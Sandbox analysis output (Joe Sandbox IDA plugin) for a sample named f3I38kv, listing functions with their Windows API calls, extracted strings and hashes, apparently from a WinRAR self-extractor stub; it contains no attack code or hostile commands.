                                                            • Instruction Fuzzy Hash: 39718E74A00219EFDB14DF64DC959BFBBB9FF49310B14015EE616A72A0CB38AD06CB60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F6FAA
                                                            • _wcslen.LIBCMT ref: 004F7013
                                                            • _wcslen.LIBCMT ref: 004F7084
                                                              • Part of subcall function 004F7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 004F7AAB
                                                              • Part of subcall function 004F7A9C: GetLastError.KERNEL32 ref: 004F7AF1
                                                              • Part of subcall function 004F7A9C: CloseHandle.KERNEL32(?), ref: 004F7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: 7f241c9a16bb95dbcebf3ab73fa42023fa4ce97b8cb9b1e452d7892e26271e14
                                                            • Instruction ID: 6e1a708e5c77eedda6e1adc3ca5dcb82ad79f2e84487c23d01d14c0dc07875cf
                                                            • Opcode Fuzzy Hash: 7f241c9a16bb95dbcebf3ab73fa42023fa4ce97b8cb9b1e452d7892e26271e14
                                                            • Instruction Fuzzy Hash: 8741C6B1D0835D7AEB20A7709D86FFF776CAF45304F00445BFB45A6282D67C6A888625
                                                            APIs
                                                              • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                                              • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                                            • EndDialog.USER32(?,00000001), ref: 0050B610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0050B637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0050B650
                                                            • SetWindowTextW.USER32(?,?), ref: 0050B661
                                                            • GetDlgItem.USER32(?,00000065), ref: 0050B66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0050B67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0050B694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: 57ff9305e1c45afb5927bd3fa802944fd6aef27e57c8d8461ea86233679064f7
                                                            • Instruction ID: 054f3e7cccde48ac2b88f79432ca78d7efe41b694813568dff07cee4f05f7333
                                                            • Opcode Fuzzy Hash: 57ff9305e1c45afb5927bd3fa802944fd6aef27e57c8d8461ea86233679064f7
                                                            • Instruction Fuzzy Hash: C421CE32604315BBE2115B66EC8EE7F3E6CFB56B86F010014F604A61E0CB539A09A635
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,233918A2,00000001,00000000,00000000,?,?,004FAF6C,ROOT\CIMV2), ref: 0050FD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,004FAF6C,ROOT\CIMV2), ref: 0050FE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 0050FE1F
                                                            • _com_issue_error.COMSUPP ref: 0050FE48
                                                            • _com_issue_error.COMSUPP ref: 0050FE52
                                                            • GetLastError.KERNEL32(80070057,233918A2,00000001,00000000,00000000,?,?,004FAF6C,ROOT\CIMV2), ref: 0050FE57
                                                            • _com_issue_error.COMSUPP ref: 0050FE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,004FAF6C,ROOT\CIMV2), ref: 0050FE80
                                                            • _com_issue_error.COMSUPP ref: 0050FE93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: d0f19eae95ff75697cb5297c0bab9e676e601f52f6de81d15c34d469a1780ab5
                                                            • Instruction ID: d8b749e0432092c3e51afa8768f37c4c8ee2a575866312d9e1b606f78102ee53
                                                            • Opcode Fuzzy Hash: d0f19eae95ff75697cb5297c0bab9e676e601f52f6de81d15c34d469a1780ab5
                                                            • Instruction Fuzzy Hash: 1D41F671A00219ABDB209F68DC4ABAEBFA8FF45710F104239F905E76D1D734A944C7A4
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F9387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004F93AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004F93C9
                                                              • Part of subcall function 004FC29A: _wcslen.LIBCMT ref: 004FC2A2
                                                              • Part of subcall function 00501FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,004FC116,00000000,.exe,?,?,00000800,?,?,?,00508E3C), ref: 00501FD1
                                                            • _swprintf.LIBCMT ref: 004F9465
                                                              • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 004F94D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 004F9514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: a9317fdffa8ccd2724cfc1bf3182a8d0e5ef3dd9df92a5422ff77b5e14dde6af
                                                            • Instruction ID: 5205fbd5e319209d9c18bd5c89ae157bd3839676b37b990c11a95b248c01136e
                                                            • Opcode Fuzzy Hash: a9317fdffa8ccd2724cfc1bf3182a8d0e5ef3dd9df92a5422ff77b5e14dde6af
                                                            • Instruction Fuzzy Hash: EE41727290026D75DF21ABA18D55EFF737CAF51344F0048AAB709E3151DA3C8F899B68
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: UP$pP$zP
                                                            • API String ID: 176396367-1396412275
                                                            • Opcode ID: e94f244cf5e538f6e690c5cdf21058527a8cc4ec16be9622a480351d07c05dbd
                                                            • Instruction ID: bb9b89218c4562d047960dea5f71c01c81f7e151611195844873ff0909e280bc
                                                            • Opcode Fuzzy Hash: e94f244cf5e538f6e690c5cdf21058527a8cc4ec16be9622a480351d07c05dbd
                                                            • Instruction Fuzzy Hash: 8341C47190066A9BCB219FA8CC5D9EF7BB8EF41311F00001AF945F7291DB34AE498BA4
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00509EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 00509F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00509FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00509FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00509FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: P$RarHtmlClassName
                                                            • API String ID: 3937224194-284636800
                                                            • Opcode ID: 34cf0b8967979db68e53b67c5b88fdad7c5b72c9aec9c78fc740c9236ad3844b
                                                            • Instruction ID: 88a747a7d7859c0da60adecfcb598c49d559e8092ea09d3a2622e70dc115a6ed
                                                            • Opcode Fuzzy Hash: 34cf0b8967979db68e53b67c5b88fdad7c5b72c9aec9c78fc740c9236ad3844b
                                                            • Instruction Fuzzy Hash: F4419C31004315AFDB225F74DC5CB6BBFA8FB98742F008559F8499A096DB34D948DB61
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 0050122E
                                                              • Part of subcall function 004FB146: GetVersionExW.KERNEL32(?), ref: 004FB16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00501251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00501263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00501274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00501284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00501294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 005012CF
                                                            • __aullrem.LIBCMT ref: 00501379
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: 8ed12c03e871d30e5acfb413e4280abe8cb973680fbe0fc0dab3aca466854952
                                                            • Instruction ID: e8e07861b0a5946a7e45feedf71d847051ae291923ca3ce82247436852151460
                                                            • Opcode Fuzzy Hash: 8ed12c03e871d30e5acfb413e4280abe8cb973680fbe0fc0dab3aca466854952
                                                            • Instruction Fuzzy Hash: 624107B15083069FC710DF65C8849AFBBE9FF88314F00892EF996C2650E738E659DB56
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 004F2536
                                                              • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                                              • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: 09abd3e00cd3e8898fe2384e1776c779231b9b910b9a185b1faa52996bd0605f
                                                            • Instruction ID: e12a0a48c0fcbbbb84e7755e0c8bf4549ec888e91c51b32d4b374fde693d9ccd
                                                            • Opcode Fuzzy Hash: 09abd3e00cd3e8898fe2384e1776c779231b9b910b9a185b1faa52996bd0605f
                                                            • Instruction Fuzzy Hash: EEF135706042889BDB14EB2486D5BBF77956F80304F08056FEE869B383CAAC9945C76A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 0d1b8895da023b27a0d84d9342e8339fd5d2438b544d2e9cf7745ad48cc5fbe5
                                                            • Instruction ID: a53ad6c90a74c69e51d371dcc28c33583daf6b9cab90f94a763487117a20d243
                                                            • Opcode Fuzzy Hash: 0d1b8895da023b27a0d84d9342e8339fd5d2438b544d2e9cf7745ad48cc5fbe5
                                                            • Instruction Fuzzy Hash: EA514C6778072395DB309A15DC2177F7BE5FFA1790F68041AF9C18B1CAFB658C8182A1
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0051FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0051F6CF
                                                            • __fassign.LIBCMT ref: 0051F74A
                                                            • __fassign.LIBCMT ref: 0051F765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0051F78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,0051FE02,00000000,?,?,?,?,?,?,?,?,?,0051FE02,00000000), ref: 0051F7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,0051FE02,00000000,?,?,?,?,?,?,?,?,?,0051FE02,00000000), ref: 0051F7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: b47c8b56b37c55bd7470c629b5247ced55598cbb2a9bdf772312dff1374b8c5d
                                                            • Instruction ID: c3e27eaba27fa7caeb855a7c36c0714800a3a63e577349687fa2645071a8bc5d
                                                            • Opcode Fuzzy Hash: b47c8b56b37c55bd7470c629b5247ced55598cbb2a9bdf772312dff1374b8c5d
                                                            • Instruction Fuzzy Hash: 4D51A4B5A00249AFDB10CFA8DC55AEEBFF4FF09300F14456AE555E7291D730AA85CBA0
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 0050CE9D
                                                              • Part of subcall function 004FB690: _wcslen.LIBCMT ref: 004FB696
                                                            • _swprintf.LIBCMT ref: 0050CED1
                                                              • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                                            • SetDlgItemTextW.USER32(?,00000066,0053946A), ref: 0050CEF1
                                                            • _wcschr.LIBVCRUNTIME ref: 0050CF22
                                                            • EndDialog.USER32(?,00000001), ref: 0050CFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 689974011-1360425832
                                                            • Opcode ID: c413e2613ed754a8f5554ae89bb209e1c43e2e50b4ea6395a3f58d01a21efbb7
                                                            • Instruction ID: 68f1a674d5c70db4a7e965e61dc83a5c63d84beb5d67631e7cb236785f830be3
                                                            • Opcode Fuzzy Hash: c413e2613ed754a8f5554ae89bb209e1c43e2e50b4ea6395a3f58d01a21efbb7
                                                            • Instruction Fuzzy Hash: 0941B0B1900659AADF219B90DC45BEE3BBCFB45300F4084A6FA09E7181EE708A44DF62
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00512937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0051293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 005129C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 005129F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00512A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: 3deb174e7c5b1a15194952d1a54d185cfea0155717b90833700362f6d36180e0
                                                            • Instruction ID: d781ad17d8834879a5a753d60a3e72bb57bab579d177c6a57b1684e82279b658
                                                            • Opcode Fuzzy Hash: 3deb174e7c5b1a15194952d1a54d185cfea0155717b90833700362f6d36180e0
                                                            • Instruction Fuzzy Hash: 1641C134A00219AFDF10DF68C885AEEBFB5FF45324F148055E819AB392D771DAA5CB90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: a55ed54d4f90f381d8bf6d5eedac16ad17d52425cf2ba36a4a91a114a5ffe66a
                                                            • Instruction ID: 7e76015e7640bfc3132aa3745c02a2f9d89da1cb64569114727eaf442313e469
                                                            • Opcode Fuzzy Hash: a55ed54d4f90f381d8bf6d5eedac16ad17d52425cf2ba36a4a91a114a5ffe66a
                                                            • Instruction Fuzzy Hash: 6B31823274434666E630AB549C46BBF7BA4FBD0320F50881FF486472C5FB50AD8183A1
                                                            APIs
                                                              • Part of subcall function 0051C868: _free.LIBCMT ref: 0051C891
                                                            • _free.LIBCMT ref: 0051C8F2
                                                              • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?), ref: 00518DE2
                                                              • Part of subcall function 00518DCC: GetLastError.KERNEL32(?,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?,?), ref: 00518DF4
                                                            • _free.LIBCMT ref: 0051C8FD
                                                            • _free.LIBCMT ref: 0051C908
                                                            • _free.LIBCMT ref: 0051C95C
                                                            • _free.LIBCMT ref: 0051C967
                                                            • _free.LIBCMT ref: 0051C972
                                                            • _free.LIBCMT ref: 0051C97D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: 81c02f0a9ce02debf75c760f98a40c291333e6ba815e5bb9a0b0d2f306b86fd9
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: EF112CB1590B16BAF530B7B1CC4AFDB7FACBF80B00F400C19B29D66092DB66A585C750
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0050E669,0050E5CC,0050E86D), ref: 0050E605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0050E61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0050E630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
